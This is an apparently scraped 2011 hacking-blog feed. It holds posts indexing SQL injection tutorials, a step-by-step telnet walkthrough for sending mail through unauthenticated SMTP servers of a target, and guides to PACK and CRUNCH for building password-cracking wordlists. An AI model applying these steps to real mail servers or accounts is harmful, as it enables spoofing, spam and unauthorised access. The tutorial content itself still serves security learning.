class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;PS - All credits for coding this script go to: s3my0n&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Quick Screenshot:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img696.imageshack.us/img696/1811/ippy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="177" src="http://img696.imageshack.us/img696/1811/ippy.png" t$="true" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;strong&gt;CODE:&lt;a href="http://paste2.org/p/1548304"&gt;http://paste2.org/p/1548304&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;DOWNLOAD:&amp;nbsp;&lt;a href="http://www.megaupload.com/?d=ENQMX9GY"&gt;http://www.megaupload.com/?d=ENQMX9GY&lt;/a&gt;&lt;/strong&gt;</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/2211187121367627043/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/07/checking-your-external-ip-from-command.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/2211187121367627043?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/2211187121367627043?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/jKJZzBPnwAk/checking-your-external-ip-from-command.html" title="CHECKING YOUR EXTERNAL IP FROM COMMAND LINE" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/07/checking-your-external-ip-from-command.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkcCRX85eyp7ImA9WhdRGE8.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-5327310034664646028</id><published>2011-07-15T20:27:00.003-05:00</published><updated>2011-08-08T11:14:24.123-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-08T11:14:24.123-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="stacked queries" /><category scheme="http://www.blogger.com/atom/ns#" term="Xpath Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="HTTP Header Injection" 
/><category scheme="http://www.blogger.com/atom/ns#" term="SQL Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="LDAP Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="Time Based Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL Injection How To" /><category scheme="http://www.blogger.com/atom/ns#" term="Cookie Injections" /><category scheme="http://www.blogger.com/atom/ns#" term="SQLi" /><category scheme="http://www.blogger.com/atom/ns#" term="Double-queries" /><category scheme="http://www.blogger.com/atom/ns#" term="Blind Injection" /><title>SQL INJECTION TUTORIALS</title><content type="html">Hey Guys - I have been getting requests for more details on how to perform manual SQL injections. I have gathered what I believe to be the best of what is out there and compiled it in my own form. I am working on putting it all into an educational format so others can benefit from it, while at the same time giving myself my own online reference guide available at any time (and to anyone else interested). I will be giving these tutorials their own pages as I find the material to be a good reference. I just posted the first few outlining some basic techniques and plan to add several more pages as the summer continues and time permits. To give you an idea of what is going to be covered: I have already posted basic injections, WAF bypassing, and blind &amp;amp; time-based injections, and still plan on covering double queries or stacked queries and XPath injections, as well as providing some general reference guides for handling Postgres &amp;amp; Oracle database injections. Please check the top of the page to see the new pages that are currently available and check back often to see what else has been added. I hope you find them all useful and appreciate the time that is going into packaging it all up for you. As always, Enjoy!&lt;br /&gt;
&lt;br /&gt;
Here is what's available so far:&lt;br /&gt;
&lt;a href="http://kaoticcreations.blogspot.com/p/basic-sql-injection-101.html"&gt;&lt;strong&gt;Basic SQL Injection 101&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://kaoticcreations.blogspot.com/p/sql-injection-waf-bypassing.html"&gt;&lt;strong&gt;SQLi &amp;amp; WAF Bypassing&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://kaoticcreations.blogspot.com/p/blind-time-based-sql-injections.html"&gt;&lt;strong&gt;BLIND &amp;amp; Time-Based SQL Injections&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://kaoticcreations.blogspot.com/2011/08/sql-injection-how-to-use-load-file-into.html"&gt;&lt;strong&gt;SQLi using LOAD FILE &amp;amp; INTO OUTFILE&lt;/strong&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8671806905307905831-5327310034664646028?l=kaoticcreations.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/wFZdHjq-yRzv2ogT16nq_Ffk1fE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wFZdHjq-yRzv2ogT16nq_Ffk1fE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/wFZdHjq-yRzv2ogT16nq_Ffk1fE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wFZdHjq-yRzv2ogT16nq_Ffk1fE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/CWtAZ/~4/q34IYvNDh9s" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/5327310034664646028/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/07/sql-injection-tutorials.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/5327310034664646028?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/5327310034664646028?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/q34IYvNDh9s/sql-injection-tutorials.html" title="SQL INJECTION TUTORIALS" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/07/sql-injection-tutorials.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0cFQXY4eip7ImA9WhdTE0Q.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-675767982142700326</id><published>2011-07-11T10:43:00.000-05:00</published><updated>2011-07-11T10:43:30.832-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-11T10:43:30.832-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Sending Messages" /><category scheme="http://www.blogger.com/atom/ns#" term="Port 25" /><category scheme="http://www.blogger.com/atom/ns#" term="Open SMTP" /><category scheme="http://www.blogger.com/atom/ns#" term="NSLOOKUP" /><category 
scheme="http://www.blogger.com/atom/ns#" term="Sending Mail" /><category scheme="http://www.blogger.com/atom/ns#" term="SMTP" /><category scheme="http://www.blogger.com/atom/ns#" term="SMTP Hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="Unathenticated Mail Servers" /><category scheme="http://www.blogger.com/atom/ns#" term="MX" /><category scheme="http://www.blogger.com/atom/ns#" term="Send Mail" /><category scheme="http://www.blogger.com/atom/ns#" term="Mail Exchange" /><title>HOW TO: Send Messages via UnAuthenticated SMTP Server</title><content type="html">Email Server Hunting with NSLookup:&lt;br /&gt;
OK, so I have shown you how to perform password profiling, and how to get cracking locally and over the network, but some of you keep asking how you find the mail servers to attack. If the FQDN or IP address is unknown, the easiest way to find this information is to use the Nslookup command-line tool to look up the MX record for the destination domain. You can try various web scanners to find it, or you can simply open a command prompt and type the following: &lt;br /&gt;
&lt;ul&gt;&lt;li&gt;nslookup&lt;/li&gt;
&lt;li&gt;set type=MX&lt;/li&gt;
&lt;li&gt;&amp;lt;enter site name&amp;gt;&lt;/li&gt;
&lt;li&gt;nslookup -type=MX &amp;lt;target IP or site name&amp;gt; (one-line equivalent of the three steps above)&lt;/li&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img714.imageshack.us/img714/5132/nslookupw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="255" m$="true" src="http://img714.imageshack.us/img714/5132/nslookupw.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/ul&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;strong&gt;NOTE:&lt;/strong&gt; if it seems to time out or returns false results, you can adjust the timing with "set timeout=20" between step 2 and step 3 above, since the default is only 15 seconds. &lt;br /&gt;
&lt;div&gt;&amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div&gt;This will send DNS queries for the MX (mail exchange) records. The output tells you which mail servers are registered for your target site. Note the first line after "Non-authoritative answer". The "MX preference" specifies which mail server to use and in which order: the lower the number, the more preferred the mail server is. If the preferences for each mail server are the same, you can use any of them. &lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;OK, so you found the email server...what now? We can fire up Hydra and start trying to bruteforce the passwords for any known emails (follow the previous tutorials for this part), but before we do, let's see how secure it really is. Keep the console open for another minute and let us see if we can use Telnet to log into the SMTP server; if we can get in, we will then see if we can send a message without any authenticated credentials. Here is how we use Telnet on Port 25 to test SMTP communication from the command line:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Telnet&lt;/li&gt;
&lt;li&gt;localecho&lt;/li&gt;
&lt;/ul&gt;This will let us view all of the characters as we type them in the console (localecho is not always required, but I find it helpful on older systems such as XP)&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;open &amp;lt;smtp server ip/name found above&amp;gt; 25&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img4.imageshack.us/img4/2143/telnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" m$="true" src="http://img4.imageshack.us/img4/2143/telnet.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;This will open telnet session between our machine and remote ip/server on port 25 (port 25 is default port for SMTP; you may need to change to fit your situation)&lt;/div&gt;&lt;ul&gt;&lt;li&gt;EHLO &amp;lt;ip/servername.com&amp;gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img198.imageshack.us/img198/6807/ehlo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" m$="true" src="http://img198.imageshack.us/img198/6807/ehlo.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;EHLO is the Extended Simple Message Transfer Protocol (ESMTP) verb and can help to establish the remote SMTP capabilities during the initial connection&lt;/div&gt;&lt;ul&gt;&lt;li&gt;MAIL FROM:sendername@email.com&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;This defines who email will be sent from (helps to use valid email to avoid errors on some setups or in case the receiver is undeliverable)&lt;/div&gt;&lt;ul&gt;&lt;li&gt;RCPT TO:receivername@email.com NOTIFY=success,failure&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;The NOTIFY is optional but can be helpful as it will cause the server to provide a message to let us know whether it worked or not. A message number of 500 means there was a failure or error, while 220 means it was a success&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;You will receive a 354 response that resembles the following:&lt;/div&gt;&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; "Copy Code 354 Start mail input; end with &amp;lt;CLRF&amp;gt;.&amp;lt;CLRF&amp;gt;"&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Subject: &amp;lt;Subject Title/Name&amp;gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;This defines the subject line of email message, &lt;strong&gt;now hit ENTER to add a blank line. &lt;/strong&gt;We need to have a blank line between the Subject header line and the Body of email to avoid errors&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Type your message now...press ENTER when done&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;This defines the body of the email message to be sent&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Just press ENTER again&lt;/li&gt;
&lt;li&gt;. (Type a Period)&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;This ends the message and lets the server know we are ready to send. You should see a message similar to this: &lt;/div&gt;&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;"250 2.6.0 &amp;lt;GUID&amp;gt; Queued mail for delivery"&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;That is it, you just sent an SMTP email message without any authentication required! You can repeat as necessary, or you can type QUIT to disconnect from the SMTP server, which should give you a message like this: &lt;br /&gt;
&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; "221 2.0.0 Service closing transmission channel."&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;You can then type QUIT once more to close the Telnet session. &lt;br /&gt;
&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;strong&gt;Note:&lt;/strong&gt; You can't use the backspace key after you have connected to the destination SMTP server within the Telnet session. If you make a mistake as you type an SMTP command, you must press ENTER and then type the command again from scratch.&lt;/div&gt;
</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/675767982142700326/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/07/how-to-send-messages-via.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/675767982142700326?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/675767982142700326?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/yGxAGUoaQ6Y/how-to-send-messages-via.html" title="HOW TO: Send Messages via UnAuthenticated SMTP Server" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/07/how-to-send-messages-via.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0EFQ30-eCp7ImA9WhZbFEs.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-651287123466659093</id><published>2011-06-19T01:40:00.000-05:00</published><updated>2011-06-19T01:40:12.350-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-19T01:40:12.350-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Passwords" /><category scheme="http://www.blogger.com/atom/ns#" term="Password Analysis and Cracking Kit" /><category scheme="http://www.blogger.com/atom/ns#" term="Wordlists" /><category 
scheme="http://www.blogger.com/atom/ns#" term="Password Analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="PACK" /><category scheme="http://www.blogger.com/atom/ns#" term="Backtrack 5" /><title>PACK - Password Analysis and Cracking Kit</title><content type="html">I made this video while I was messing around trying to figure out how to get started with the whole making-videos thing. PACK stands for Password Analysis and Cracking Kit, and it can be a handy tool to have around. It can be used to analyze your wordlists and provide you with helpful statistics which can show trends. These trends can be used to help you identify the quickest methods for yielding the highest results. It also has the ability to provide an analysis output of the proposed masks to use, or that would be needed, which can be very handy for inputting into tools in the Hashcat suite. It does not do much else; hope you enjoy it nonetheless...&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://2.gvt0.com/vi/pUCoMmsztIo/0.jpg"&gt;&lt;param name="movie" value="http://www.youtube.com/v/pUCoMmsztIo&amp;fs=1&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266"  src="http://www.youtube.com/v/pUCoMmsztIo&amp;fs=1&amp;source=uds" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8671806905307905831-651287123466659093?l=kaoticcreations.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/asRIC9LEZnR7Aoo5-Pq18PEu8wE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/asRIC9LEZnR7Aoo5-Pq18PEu8wE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/asRIC9LEZnR7Aoo5-Pq18PEu8wE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/asRIC9LEZnR7Aoo5-Pq18PEu8wE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/CWtAZ/~4/G8VPtNPNNko" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/651287123466659093/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/06/pack-password-analysis-and-cracking-kit.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/651287123466659093?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/651287123466659093?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/G8VPtNPNNko/pack-password-analysis-and-cracking-kit.html" title="PACK - Password Analysis and Cracking Kit" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/06/pack-password-analysis-and-cracking-kit.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D04CSHs8eip7ImA9WhZbFEs.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-3096852540218767945</id><published>2011-06-19T01:33:00.001-05:00</published><updated>2011-06-19T01:46:09.572-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-19T01:46:09.572-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Creating Wordlist" /><category scheme="http://www.blogger.com/atom/ns#" term="Wordlist" /><category scheme="http://www.blogger.com/atom/ns#" term="Word Generator" /><category 
scheme="http://www.blogger.com/atom/ns#" term="Common User Password Profiler" /><category scheme="http://www.blogger.com/atom/ns#" term="Password Profiling" /><category scheme="http://www.blogger.com/atom/ns#" term="CRUNCH" /><category scheme="http://www.blogger.com/atom/ns#" term="WYD" /><category scheme="http://www.blogger.com/atom/ns#" term="Wordlist tools" /><category scheme="http://www.blogger.com/atom/ns#" term="CUPP" /><title>Wordlists &amp; Password Profiling with CRUNCH, WyD, &amp; CUPP</title><content type="html">&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Today I am going to show you how to use three (3) different tools in Linux (Backtrack 5) for creating targeted wordlists to help speed up and increase the chance of success for your dictionary attacks. I will be covering the use of CRUNCH for pure wordlist generation, and then I will cover the use of WyD and CUPP which use password profiling techniques to create targeted wordlists to narrow your attacks. I will provide the written walk through here with a video at the end. Let's begin with CRUNCH...&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;=====================================================================================&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;++++++++++++++++++++++++++++CRUNCH - WORDLIST GENERATOR+++++++++++++++++++++++++++++&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;=====================================================================================&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;CRUNCH is a wordlist generator based on the user specified character set. It takes the character set designated by the user and generates all combinations and permutations possible into a nice new wordlist for you to use in your dictionary/bruteforce tools. It supports lower and upper alpha-numeric as well as special character set and also has the ability to break the output into multiple files based on the number of lines or designated file size. It also has the ability to pause and resume which is helpful when generating very large wordlists that may take some time to fully compile. You can download the latest version from the sourceforge homepage, which is located here: http://sourceforge.net/projects/crunch-wordlist/files/&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;You will need to download and extract using the following methods:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: tar -zxvf crunch-3.0.1.tgz&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: cd crunch-3.0.1/&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: make &amp;amp;&amp;amp; make install&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 2;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Crunch can be used to create great wordlists and with the proper sytnax can even be piped directly into brute-forcing tools, for example AirCrack and CowPatty can use the 
piped output for Wireless password cracking (I highly suggest CowPatty if you are dealing with large wordlists due to restrictions in AirCrack on the number of keys that can be processed).&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Basic syntax of CRUNCH looks like this (See MAN Pages for details):&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;./ crunch &amp;lt;min-len&amp;gt; &amp;lt;max-len&amp;gt; [-f /path/to/charset.lst charset-name] [-o&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;wordlist.txt]&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;[-t [FIXED]@@@@] [-s startblock] [-c number]&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Breakdown of Syntax:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;min-len = minimum length string to start at (REQUIRED)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;max-len = maximum length string to end at.&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;(REQUIRED) &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;charset = defines the char set to use (If you leave it will use lower case alpha only. 
&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 85.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;NOTE: If you want to include the space character in your character set you must enclose your character set in quotes, like so: "abc ". If you want to use char set files you can reference the -t argument below or just paste it in (check my Hashcat tutorial for full char sets you can use, or reference the charsets.lst that installs with Crunch in the default directory). &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;-b = number[type: kb/mb/gb] - specifies the size of each output file (no space between the number and type: 50kb/50mb/50gb). 
